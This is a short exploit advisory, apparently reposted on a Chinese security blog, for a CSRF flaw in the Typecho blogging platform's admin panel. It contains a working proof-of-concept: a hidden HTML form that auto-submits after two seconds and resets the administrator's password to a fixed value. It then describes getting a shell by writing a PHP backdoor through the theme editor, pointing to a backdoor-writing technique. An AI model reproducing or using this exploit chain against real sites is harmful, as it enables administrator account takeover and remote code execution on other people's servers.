We enjoy hacking of life in day and night. _______________________________________________ [+] HSID: FF000-HSDB-0002 [+] Author: Evi1m0 <evi1m0.bat@gmail.com> [+] Team: FF0000 TEAM <http://www.ff0000.cc> [+] From: HackerSoul <http://www.hackersoul.com> [+] Create: 2014-06-22 _______________________________________________ -= Main =- [*] 1. Description http://typecho/admin/profile.php page, Change password form CSRF vul. http://typecho/admin/themes.php, We can write the PHP Backdoor in this page. [*] 2. CSRF POC
<div style="display: none;"> <form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="password" value="bug1024"/> <input type="hidden" name="confirm" value="bug1024" /> <input name="do" type="hidden" value="password" /> <button type="submit"></button> </form> </div> <script> setTimeout("document.ff0000team.submit()", 2000); </script>
[*] 3. GETSHELL http://typecho/admin/theme-editor.php page, Write backdoor. Or, Write this: http://www.hackersoul.com/post/PHP中使用按位取反函数创建后门. html -= END =- |
-
上一篇: 用友协作办公平台通杀SQL注入 - 网站安全 - 自学
下一篇: php-mysql-sleep-benchmark注入引起的攻击 - 网站安全
还没有人抢沙发呢~